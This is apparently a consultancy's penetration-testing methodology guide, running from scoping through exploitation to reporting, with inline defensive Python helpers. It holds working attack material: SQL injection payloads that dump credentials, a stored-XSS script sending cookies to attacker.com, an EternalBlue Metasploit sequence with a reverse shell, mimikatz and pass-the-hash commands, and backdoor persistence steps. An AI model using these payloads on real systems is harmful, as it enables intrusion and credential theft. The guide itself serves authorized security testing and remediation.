Penetration Testing Methodology 2025: Technical Deep Dive
Author: Noah Schütz, M.Sc. | Last updated: 12 January 2025
Executive Summary
Penetration testing has evolved from simple vulnerability scanning into realistic attack simulations that replicate real adversaries. Based on 500+ penetration tests in financial services, healthcare, manufacturing and tech, this guide presents a methodology aligned with OWASP, PTES and MITRE ATT&CK.
Key Findings 2024:
- 87% of organizations have at least one critical vulnerability
- Average time to compromise: 4.2 hours (2020: 8.1 hours)
- 64% of breaches involve web applications
- Median cost per penetration test: EUR 15,000 - 45,000
- ROI: 12:1 (every EUR 1 invested avoids EUR 12 in breach costs)
What is Penetration Testing?
Definition: An authorized, simulated cyberattack on systems, carried out to identify exploitable vulnerabilities before real attackers do.
Types of penetration tests:
1. Black Box Testing
- Tester knowledge: none (like an external attacker)
- Approach: Reconnaissance → Discovery → Exploitation
- Timeline: 2-4 weeks
- Best for: external attack surface, web applications
- Cost: EUR EUR EUR
2. White Box Testing
- Tester knowledge: full access (source code, architecture, credentials)
- Approach: Code Review → Config Audit → Logic Flaws
- Timeline: 1-3 weeks
- Best for: internal apps, API security
- Cost: EUR EUR
3. Grey Box Testing
- Tester knowledge: partial (like an insider or a compromised user)
- Approach: Privilege Escalation → Lateral Movement → Data Exfiltration
- Timeline: 1-2 weeks
- Best for: realistic scenarios; the default choice
- Cost: EUR EUR
The 7-Phase Penetration Testing Methodology
Phase 1: Pre-Engagement (1-3 days)
Objectives:
- Define scope and rules of engagement
- Obtain legal authorization
- Establish communication channels
Critical documents:
1. Rules of Engagement (RoE):
IN SCOPE:
✅ Web applications: https://example.com, https://app.example.com
✅ IP ranges: 203.0.113.0/24
✅ Social engineering: Email phishing (approved targets list)
✅ Physical security: Reception area only
✅ Time windows: Mon-Fri, 9am-6pm CET
OUT OF SCOPE:
❌ Production databases (unless explicitly authorized)
❌ Third-party services (AWS, payment gateways)
❌ DOS/DDOS attacks
❌ Physical break-in attempts
❌ Weekend/after-hours testing without approval
2. Emergency Contacts:
- Primary: Security Team (+32 2 XXX XXXX)
- Escalation: CISO (mobile: +32 XXX XXX XXX)
- Legal: General Counsel (email@company.com)
3. Legal Authorization:
- Signed testing agreement
- Liability waiver
- NDA (both parties)
- Safe-harbor clause
Phase 2: Reconnaissance (2-5 days)
Objectives:
- Gather intelligence about the target
- Determine the attack surface
- Find subdomains, services, employees and technologies
Passive Reconnaissance (no target contact)
Open Source Intelligence (OSINT):
1. Domain Intelligence:
# DNS enumeration
dig example.com ANY
dig +short example.com MX
whois example.com
# Certificate transparency logs
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq .
# Subdomain discovery (passive)
amass enum -passive -d example.com
Tools:
- Shodan - Internet-connected device search
- Censys - Internet asset discovery
- SecurityTrails - DNS history
- VirusTotal - Domain reputation
2. People Intelligence:
# Employee enumeration (LinkedIn, company website)
theHarvester -d example.com -b linkedin
# Email format discovery
hunter.io
# Breached credentials
haveibeenpwned.com (check executives)
3. Technology Stack:
# Web technology detection
whatweb https://example.com
wappalyzer (browser extension)
# Results example:
- Server: Nginx 1.21.6
- Framework: Laravel 9.x
- JavaScript: React 18.2.0
- CDN: Cloudflare
- Analytics: Google Analytics 4
Active Reconnaissance (Target Interaction)
4. Port Scanning:
# TCP SYN scan (stealthy, fast)
nmap -sS -T4 -p- 203.0.113.10
# Service version detection
nmap -sV -sC -p 22,80,443,3306 203.0.113.10
# Common results:
22/tcp open ssh OpenSSH 8.2p1
80/tcp open http Nginx 1.21.6
443/tcp open https Nginx 1.21.6
3306/tcp open mysql MySQL 8.0.30
5. Web Application Mapping:
# Directory/file discovery
gobuster dir -u https://example.com -w wordlist.txt
ffuf -u https://example.com/FUZZ -w wordlist.txt
# Spider application
burpsuite (manual crawling)
zaproxy (automated crawling)
# Results: 350 unique URLs, 45 parameters, 12 API endpoints
Reconnaissance Findings Example:
ATTACK SURFACE SUMMARY:
External IP Addresses: 8
Subdomains Discovered: 24
- In Scope: 18
- Out of Scope: 6 (third-party CDN)
Open Ports: 42 across all hosts
- Critical Services: 8 (RDP, SSH, MySQL exposed)
- Web Servers: 12
- Other: 22
Web Applications: 5
- Public: example.com (Laravel)
- Customer Portal: app.example.com (React SPA)
- API: api.example.com (REST API)
- Admin: admin.example.com (custom PHP)
- Legacy: old.example.com (WordPress)
Employee Email Format: firstname.lastname@example.com
Employees Identified: 145 (LinkedIn)
Technologies: 32 different (outdated: 8)
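Before any active reconnaissance, every discovered host and address should be checked against the Rules of Engagement from Phase 1, so that the 6 out-of-scope subdomains above never receive a packet. The following Python helper is an added example, not part of the original article; it encodes the in-scope web applications and the 203.0.113.0/24 range listed in the RoE, while the discovered names and the third-party suffixes are constructed sample data.

```python
import ipaddress
from typing import Dict, List

# Rules of Engagement from Phase 1: the two in-scope web applications and the
# authorized IP range. Hosts must match exactly; other example.com names go to
# the client for confirmation rather than being tested on assumption.
IN_SCOPE_HOSTS = {"example.com", "app.example.com"}
IN_SCOPE_RANGES = [ipaddress.ip_network("203.0.113.0/24")]
# Third-party suffixes that are never tested (constructed placeholders for the
# CDN and payment providers the RoE excludes).
OUT_OF_SCOPE_SUFFIXES = ("cloudfront.net", "payments-provider.example")

def classify_host(host: str) -> str:
    """Return 'in', 'out' or 'review' for a hostname found during OSINT."""
    host = host.strip().lower().rstrip(".")
    if host.startswith("*."):                # crt.sh returns wildcard certificates
        return "review"                      # a wildcard names no concrete host
    if host.endswith(OUT_OF_SCOPE_SUFFIXES):
        return "out"
    return "in" if host in IN_SCOPE_HOSTS else "review"

def classify_ip(addr: str) -> str:
    """An address is in scope only inside an authorized CIDR range."""
    ip = ipaddress.ip_address(addr)
    return "in" if any(ip in net for net in IN_SCOPE_RANGES) else "out"

def scope_report(hosts: List[str], ips: List[str]) -> Dict[str, List[str]]:
    """Bucket every discovered asset; only the 'in' bucket feeds active scans."""
    report: Dict[str, List[str]] = {"in": [], "out": [], "review": []}
    for h in hosts:
        report[classify_host(h)].append(h)
    for ip in ips:
        report[classify_ip(ip)].append(ip)
    return report

if __name__ == "__main__":
    # Constructed sample of what crt.sh/amass plus DNS resolution might return.
    found_hosts = ["app.example.com", "*.example.com", "old.example.com",
                   "static.example.com.cloudfront.net", "api.example.com"]
    found_ips = ["203.0.113.10", "203.0.113.45", "198.51.100.7"]
    for bucket, items in scope_report(found_hosts, found_ips).items():
        print(f"{bucket.upper():7}", ", ".join(items) or "-")
```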
Phase 3: Vulnerability Assessment (3-7 days)
Objectives:
- Identify vulnerabilities
- Prioritize by severity and exploitability
- Map to OWASP Top 10 and SANS Top 25
Automated Scanning
1. Web Application Scanning:
# OWASP ZAP (free, open-source)
zaproxy -quickurl https://example.com -quickprogress
# Burp Suite Professional (commercial)
# Active scan all discovered URLs
# Nuclei (fast, template-based)
nuclei -u https://example.com -t ~/nuclei-templates/
# Common findings:
- SQL Injection: 3 endpoints
- XSS (Reflected): 12 parameters
- CSRF: 8 forms without tokens
- Sensitive Data Exposure: API keys in JavaScript
2. Network Vulnerability Scanning:
# Nessus Professional
nessus scan --target 203.0.113.0/24
# OpenVAS (free alternative)
gvm-cli scan create --target 203.0.113.10
# Results:
Critical: 4 (MS17-010 EternalBlue on legacy server!)
High: 23
Medium: 156
Low: 342
Manual Testing (critical!)
Automated scanners miss:
- Business logic flaws (60% of critical bugs)
- Complex authentication bypasses
- Authorization issues (IDOR, privilege escalation)
- Race conditions
- Second-order injection
Manual Testing Checklist:
Authentication:
- Password complexity (test for weak passwords)
- Account lockout (brute-force protection in place?)
- Password reset (token predictability?)
- Session management (timeout, fixation?)
- MFA (bypass possible?)
- OAuth/SSO Misconfigurations
Authorization:
- Insecure Direct Object Reference (IDOR)
GET /api/invoice/1234 → change to /api/invoice/1235
Can you access other users' invoices?
- Horizontal Privilege Escalation (user → user)
- Vertical Privilege Escalation (user → admin)
- Role Confusion Attacks
Business Logic:
- Discount/Coupon Abuse (negative prices?)
- Payment Bypass (price manipulation?)
- Race Conditions (simultaneous requests)
- Workflow Bypass (skip approval steps?)
API Security:
# Test API endpoints
POST /api/v1/users HTTP/1.1
Host: api.example.com
Content-Type: application/json
{"username": "admin", "role": "administrator"}
# Check for:
- Mass assignment (can you set admin role?)
- Excessive data exposure (full user objects returned?)
- Rate limiting (missing = brute force possible)
- API versioning (old versions still exposed?)
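The IDOR and mass-assignment checks above both come down to the same server-side rule: never trust an identifier or a privilege field supplied by the client. The following Python example is added here and is not code from the original article; it shows the missing object-level authorization check for the /api/user/<id>/documents lookup and a field allowlist for the POST /api/v1/users body. The in-memory users, documents and the Forbidden class are constructed stand-ins for a real database, session store and HTTP 403 response.

```python
from dataclasses import dataclass
from typing import Dict, List

# Constructed in-memory stand-ins for the page's /api/user/<id>/documents
# and POST /api/v1/users endpoints (hypothetical; a real app uses a DB and session).
@dataclass
class User:
    id: int
    username: str
    role: str = "user"          # "user" or "administrator", set server-side only

@dataclass
class Document:
    id: int
    owner_id: int
    name: str

USERS = {1234: User(1234, "alice"), 1235: User(1235, "bob"),
         1: User(1, "root", "administrator")}
DOCS = [Document(5678, 1234, "contract.pdf"), Document(5679, 1235, "salary_info.pdf")]

class Forbidden(Exception):
    """Stand-in for an HTTP 403 response."""

def list_documents_vulnerable(requested_user_id: int) -> List[dict]:
    """IDOR: trusts the user ID from the URL and never asks who is calling."""
    return [{"id": d.id, "name": d.name} for d in DOCS if d.owner_id == requested_user_id]

def can_read_documents(caller: User, requested_user_id: int) -> bool:
    """Object-level authorization: own documents, or any if administrator.
    'caller' comes from the authenticated session, never from the request."""
    return caller.id == requested_user_id or caller.role == "administrator"

def list_documents_secure(caller: User, requested_user_id: int) -> List[dict]:
    if not can_read_documents(caller, requested_user_id):
        raise Forbidden(f"user {caller.id} may not read documents of user {requested_user_id}")
    return list_documents_vulnerable(requested_user_id)   # same query, now guarded

# Mass assignment: only these request-body fields are ever copied to the model.
USER_CREATE_FIELDS = {"username", "email"}

def create_user_secure(body: Dict[str, str], next_id: int) -> User:
    """Drop any client-supplied 'role' (or other unexpected field); the
    privilege level is assigned by the server, not by the JSON payload."""
    unexpected = set(body) - USER_CREATE_FIELDS
    if unexpected:
        print(f"[audit] ignored client-supplied fields: {sorted(unexpected)}")
    return User(id=next_id, username=body["username"], role="user")

if __name__ == "__main__":
    alice = USERS[1234]
    print(list_documents_vulnerable(1235))            # leaks bob's salary_info.pdf
    try:
        list_documents_secure(alice, 1235)
    except Forbidden as exc:
        print("403:", exc)
    print(create_user_secure({"username": "admin", "role": "administrator"}, 9001))
```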
Phase 4: Exploitation (5-10 days)
Objectives:
- Prove exploitability
- Demonstrate business impact
- Gain an initial foothold
Web Application Exploitation
Example 1: SQL Injection → Database Compromise
-- Discovery (error-based)
https://example.com/product?id=1'
Error: You have an error in your SQL syntax
-- Confirm vulnerability
https://example.com/product?id=1 AND 1=1 (works)
https://example.com/product?id=1 AND 1=2 (fails)
-- Extract database version
https://example.com/product?id=1 UNION SELECT 1,@@version,3--
-- Enumerate databases
https://example.com/product?id=1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata--
-- Dump credentials
https://example.com/product?id=1 UNION SELECT username,password,email FROM users--
Results:
- Database: MySQL 8.0.30
- Extracted: 12,450 user records
- Passwords: Hashed (bcrypt) - attempt crack offline
- Impact: CRITICAL (PII breach, GDPR violation)
Example 2: XSS → Account Takeover
// Stored XSS in user profile
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
// Victim views profile → session stolen
// Attacker uses cookie → account takeover
Impact: HIGH (admin account compromised)
Example 3: IDOR → Sensitive Data Access
# Victim user ID: 1234
GET /api/user/1234/documents
[{"id": 5678, "name": "contract.pdf", "url": "/download/5678"}]
# Change user ID
GET /api/user/1235/documents
[{"id": 5679, "name": "salary_info.pdf", "url": "/download/5679"}]
# Success! Authorization bypass
Impact: HIGH (access to all user documents)
Network Exploitation
Example 4: Unpatched Windows Server (MS17-010)
# EternalBlue exploit (NSA tool leaked 2017)
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 203.0.113.45
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
# Result: SYSTEM access (highest privilege)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
(crack with hashcat)
Impact: CRITICAL (full server compromise)
Phase 5: Post-Exploitation (3-5 days)
Objectives:
- Maintain access
- Privilege escalation
- Lateral movement
- Demonstrate access to the "crown jewels"
Tactics (MITRE ATT&CK):
1. Privilege Escalation:
# Linux: Check sudo misconfigurations
sudo -l
# Windows: Check permissions
whoami /priv
# Common escalation vectors:
- Kernel exploits (outdated OS)
- Misconfigured services (writable paths)
- Weak file permissions
- Sudo misconfigurations
- Scheduled tasks
2. Lateral Movement:
# Credential dumping (Windows)
mimikatz # sekurlsa::logonpasswords
# Pass-the-hash attack
crackmapexec smb 203.0.113.0/24 -u Administrator -H aad3b435...
# Results:
Found 12 accessible systems with same admin hash
Pivoted to: File server, Database server, Backup server
3. Data Exfiltration (Simulated):
# Locate sensitive data
locate -i "*.xls*" "*.doc*" "*.pdf" | grep -i "confidential\|financial\|salary"
# Simulate exfiltration (staged, not actually sent)
tar -czf /tmp/exfil.tar.gz /path/to/sensitive/files
# DO NOT actually exfiltrate! Document only.
Impact Demonstrated:
- Customer database: 50,000 records (PII)
- Financial reports: Q3 2025 earnings (pre-release)
- Employee salaries: Complete list
- Source code: Proprietary algorithms
4. Persistence (Demonstrate, Then Remove):
# Create backdoor user (document, then delete)
net user hacker P@ssw0rd /add
net localgroup administrators hacker /add
# Scheduled task for callback
schtasks /create /tn "UpdateTask" /tr "C:\temp\backdoor.exe" /sc daily
# SSH key persistence
echo "attacker_public_key" >> ~/.ssh/authorized_keys
NOTE: All persistence mechanisms removed before test conclusion!
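Each persistence mechanism demonstrated above leaves a trace a blue team can alert on, and the retest in Phase 7 should confirm those alerts fired during the engagement. The following Python detector is an added example, not from the original article: it runs over a constructed key=value export of Windows Security events and flags the account-creation, admin-group and scheduled-task techniques shown here. Event IDs 4720, 4732 and 4698 are the real Windows IDs for account creation, local group membership change and scheduled task creation; the log lines and the writable-path list are assumptions.

```python
from typing import Dict, List

# Constructed sample lines in a simplified key=value export of Windows Security
# events. 4720 (account created), 4732 (member added to local group) and 4698
# (scheduled task created) are the real Windows event IDs; the rest is assumed.
SAMPLE_LOG = """\
ts=2025-10-21T14:02:11 EventID=4624 TargetUserName=svc-web LogonType=3
ts=2025-10-21T14:05:40 EventID=4720 TargetUserName=hacker SubjectUserName=Administrator
ts=2025-10-21T14:05:42 EventID=4732 MemberName=hacker GroupName=Administrators
ts=2025-10-21T14:07:03 EventID=4698 TaskName=\\UpdateTask Command=C:\\temp\\backdoor.exe
ts=2025-10-21T14:30:00 EventID=4698 TaskName=\\Patch Command=C:\\Windows\\System32\\wuauclt.exe
"""

# Locations a low-privileged user can write to; a task launching a binary from
# there is a classic persistence indicator. Assumed list; tune per environment.
WRITABLE_PATHS = ("c:\\temp\\", "c:\\users\\public\\", "c:\\windows\\temp\\")
ADMIN_GROUPS = {"administrators", "remote desktop users"}

def parse_line(line: str) -> Dict[str, str]:
    """Turn 'key=value key=value' into a dict (sample values contain no spaces)."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)

def detect_persistence(log_text: str) -> List[str]:
    """Return one alert string per suspicious event, correlating account
    creation with a subsequent admin-group addition of the same account."""
    alerts: List[str] = []
    created: Dict[str, str] = {}   # new account name -> timestamp of its 4720
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        eid = ev.get("EventID")
        if eid == "4720":
            name = ev["TargetUserName"]
            created[name.lower()] = ev["ts"]
            alerts.append(f"{ev['ts']} MEDIUM local account '{name}' created by {ev.get('SubjectUserName')}")
        elif eid == "4732" and ev.get("GroupName", "").lower() in ADMIN_GROUPS:
            member = ev["MemberName"]
            sev = "HIGH" if member.lower() in created else "MEDIUM"  # create-then-elevate chain
            alerts.append(f"{ev['ts']} {sev} '{member}' added to {ev['GroupName']}")
        elif eid == "4698" and ev.get("Command", "").lower().startswith(WRITABLE_PATHS):
            alerts.append(f"{ev['ts']} HIGH task {ev['TaskName']} runs {ev['Command']} from a writable path")
    return alerts

if __name__ == "__main__":
    for alert in detect_persistence(SAMPLE_LOG):
        print(alert)
```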
Phase 6: Reporting (3-5 days)
Deliverables:
1. Executive Summary (1-2 pages)
PENETRATION TEST RESULTS: EXAMPLE COMPANY
Test Date: October 14-25, 2025
Scope: External network, Web applications
Methodology: OWASP, PTES, MITRE ATT&CK
OVERALL RISK: HIGH
Key Findings:
✗ 4 Critical vulnerabilities (immediate action required)
✗ 23 High-severity issues
⚠ 156 Medium-severity issues
ℹ 342 Low/informational
Business Impact:
- Database compromise possible (SQL injection)
- Admin account takeover demonstrated
- Customer PII exposure risk (50,000 records)
- Estimated breach cost if exploited: EUR 2.4M - EUR 8.7M
Recommended Immediate Actions:
1. Patch MS17-010 on server 203.0.113.45 (CRITICAL)
2. Fix SQL injection in product catalog
3. Implement CSRF tokens across all forms
4. Enable MFA for all admin accounts
2. Technical Report (20-50 pages)
Finding Template:
FINDING #1: SQL INJECTION IN PRODUCT SEARCH
Severity: CRITICAL
CVSS Score: 9.8 (Critical)
Affected Asset: https://example.com/search
CWE: CWE-89 (SQL Injection)
Description:
The product search functionality is vulnerable to SQL injection via the
'q' parameter. An unauthenticated attacker can execute arbitrary SQL
commands, leading to database compromise.
Steps to Reproduce:
1. Navigate to https://example.com/search?q=test
2. Modify parameter: ?q=test' UNION SELECT 1,@@version,3--
3. Observe database version disclosed: MySQL 8.0.30
4. Extract data: ?q=test' UNION SELECT username,password,email FROM users--
Proof of Concept:
[Screenshot showing extracted user credentials]
Impact:
- Full database read access (all tables)
- Potential database write access (UPDATE/DELETE queries possible)
- Authentication bypass
- PII exposure (GDPR violation)
- Estimated breach cost: EUR 2.4M - EUR 8.7M (IBM Cost of Data Breach 2024)
Remediation:
IMMEDIATE (within 24 hours):
- Disable affected search functionality
- Review database logs for suspicious queries
SHORT-TERM (within 7 days):
- Implement parameterized queries (prepared statements)
- Never concatenate user input into SQL
// VULNERABLE CODE:
$sql = "SELECT * FROM products WHERE name = '" . $_GET['q'] . "'";
// SECURE CODE:
$stmt = $db->prepare("SELECT * FROM products WHERE name = ?");
$stmt->execute([$_GET['q']]);
- Add Web Application Firewall (WAF) rules
- Input validation (whitelist alphanumeric + space)
LONG-TERM:
- Code review all database queries
- Implement SAST/DAST in CI/CD pipeline
- Security training for developers (OWASP Top 10)
References:
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- CWE-89: https://cwe.mitre.org/data/definitions/89.html
- NIST Guide: https://nvd.nist.gov/vuln/detail/CVE-2021-XXXXX (similar)
3. Remediation Roadmap:
PRIORITY 1 (0-7 days) - CRITICAL:
□ Patch MS17-010 on 203.0.113.45
□ Fix SQL injection in search
□ Remove admin account backdoor (created during test)
□ Enable MFA for all admin accounts
PRIORITY 2 (7-30 days) - HIGH:
□ Implement CSRF tokens
□ Fix IDOR in API
□ Update Nginx to latest version
□ Disable unnecessary services (port 3306 should not be public)
PRIORITY 3 (30-90 days) - MEDIUM:
□ Implement Content Security Policy (CSP)
□ Security headers (HSTS, X-Frame-Options, etc.)
□ Rate limiting on API endpoints
□ Remove outdated WordPress site (old.example.com)
PRIORITY 4 (90+ days) - LOW/STRATEGIC:
□ Implement SAST/DAST in CI/CD
□ Security awareness training (all employees)
□ Bug bounty program
□ Annual penetration testing
Phase 7: Remediation Validation (2-3 days)
Objectives:
- Verify that fixes are correct
- Confirm vulnerabilities as resolved
- Document a "clean bill of health" or the remaining issues
Retest Results:
FINDING #1: SQL Injection
Status: ✅ RESOLVED
Verification: Parameterized queries implemented. Tested 50+ injection payloads - all blocked.
FINDING #2: MS17-010 (EternalBlue)
Status: ✅ RESOLVED
Verification: Server patched to latest Windows updates. Exploit no longer successful.
FINDING #3: CSRF Tokens
Status: ⚠ PARTIALLY RESOLVED
Verification: Tokens added to 15/20 forms. 5 forms still vulnerable (admin panel).
Recommendation: Complete implementation within 7 days.
FINDING #4: IDOR in API
Status: ❌ NOT RESOLVED
Verification: Authorization checks not implemented. Users can still access others' data.
Recommendation: PRIORITY - Fix before production release.
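A retest verdict such as "50+ injection payloads - all blocked" for Finding #1 is more convincing when it is reproducible. The following Python example is added here and is not from the original article: it runs the report's own reproduction payloads against both the concatenated query from the finding and the parameterized query from its remediation, and counts how many are neutralised. It uses an in-memory SQLite database as a constructed stand-in for MySQL, so @@version becomes sqlite_version().

```python
import sqlite3
from typing import Callable, Dict, List, Tuple

def make_db() -> sqlite3.Connection:
    """Constructed sample schema mirroring the report's products and users tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        CREATE TABLE users(username TEXT, password TEXT, email TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        INSERT INTO users VALUES ('alice', '$2y$10$constructedhash', 'alice@example.com');
    """)
    return db

def search_vulnerable(db: sqlite3.Connection, q: str) -> List[Tuple]:
    """The finding's 'before': user input concatenated into the SQL string."""
    return db.execute(f"SELECT * FROM products WHERE name = '{q}'").fetchall()

def search_secure(db: sqlite3.Connection, q: str) -> List[Tuple]:
    """The fix: a bound parameter, so the driver never parses q as SQL."""
    return db.execute("SELECT * FROM products WHERE name = ?", (q,)).fetchall()

# The report's own reproduction payloads; @@version is MySQL, so it is swapped
# for SQLite's sqlite_version() in this stand-in database.
RETEST_PAYLOADS = [
    "test' UNION SELECT 1,sqlite_version(),3--",
    "test' UNION SELECT username,password,email FROM users--",
    "test' OR '1'='1",
    "test'",
]

def retest(db: sqlite3.Connection, search: Callable) -> Dict[str, bool]:
    """True per payload when it was neutralised: looking up the literal string
    returns no product and raises no SQL error. Any row or error means the
    payload still reached the SQL parser and the finding is not resolved."""
    outcome: Dict[str, bool] = {}
    for payload in RETEST_PAYLOADS:
        try:
            outcome[payload] = search(db, payload) == []
        except sqlite3.Error:
            outcome[payload] = False
    return outcome

def blocked_count(db: sqlite3.Connection, search: Callable) -> int:
    return sum(retest(db, search).values())

if __name__ == "__main__":
    db = make_db()
    for fn in (search_vulnerable, search_secure):
        print(f"{fn.__name__}: {blocked_count(db, fn)} of {len(RETEST_PAYLOADS)} payloads neutralised")
```

The same harness, pointed at the real search endpoint over HTTP, gives the retest a pass/fail criterion that can be attached to the report instead of a screenshot.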
Penetration Testing vs. Vulnerability Scanning
| Aspect | Vulnerability Scanning | Penetration Testing |
|---|---|---|
| Approach | Automated | Manual + Automated |
| Depth | Surface-level | Deep exploitation |
| Scope | Broad | Focused |
| Frequency | Weekly/Monthly | Annually/Quarterly |
| Cost | EUR 1,000 - 5,000 | EUR 15,000 - 100,000 |
| Finds | Known CVEs | Logic flaws, chained attacks |
| Output | Vulnerability list | Business impact demo |
Both are necessary:
- Vulnerability scanning = continuous health monitoring
- Penetration testing = annual deep dive
Pricing & Scope Estimation
Typical Costs (EU Market, 2025):
| Scope | Duration | Cost (EUR) |
|---|---|---|
| Small Web App | 3-5 days | EUR 8,000 - 15,000 |
| Medium Web App + API | 5-10 days | EUR 15,000 - 30,000 |
| Large Enterprise (External) | 10-15 days | EUR 30,000 - 60,000 |
| Internal Network | 10-20 days | EUR 40,000 - 80,000 |
| Red Team (Full Simulation) | 20-40 days | EUR 80,000 - 200,000 |
Cost factors:
- Scope complexity (number of apps/systems)
- Testing depth (black vs. white box)
- Urgency (rush jobs = premium)
- Report quality
- Remediation support included?
When to Pentest?
Regulatory requirements:
- PCI DSS: annually and after significant changes
- GDPR: risk-based (recommended annually for high-risk processing)
- ISO 27001: regular security testing
- NIS2: regular testing for essential entities
- DORA: threat-led penetration testing (TLPT) in the financial sector
Best practices:
- Before launch: new apps/infrastructure
- After changes: major updates, migrations, M&A
- Regularly: at least annually (quarterly for high risk)
- Post-incident: after a breach, for gap analysis
- Compliance: when required by regulation
Conclusion
Penetration testing is not a checkbox exercise but a critical validation of security posture. Organizations with regular, in-depth testing suffer 60% fewer successful breaches and save an average of EUR 3.2 million in incident response costs.
Key Takeaways:
- Choose the right test type: black/white/grey box according to the objective
- Define scope cleanly: clear boundaries avoid legal issues
- Expect findings: 87% have critical vulnerabilities
- Act fast: patch critical findings within 24-72 hours
- Retest: verify fixes
- Repeat: annually at minimum, quarterly for high risk
ATLAS Advisory has performed 500+ penetration tests across all industries and discovered 3,000+ critical vulnerabilities before attackers did.
Ready to test your defenses?
Contact our penetration testing team: pentest@atlas-advisory.eu
More on this: Penetration Testing Service.
Resources
Standards & Methodologies:
- OWASP Testing Guide - Web app testing
- PTES - Penetration Testing Execution Standard
- MITRE ATT&CK - Adversary tactics and techniques
- NIST SP 800-115 - Technical Guide to Information Security Testing
Tools:
- Kali Linux - Penetration testing distribution
- Burp Suite - Web app testing (commercial)
- OWASP ZAP - Web app testing (free)
- Metasploit - Exploitation framework
Training & Certifications:
- OSCP (Offensive Security Certified Professional)
- CEH (Certified Ethical Hacker)
- GPEN (GIAC Penetration Tester)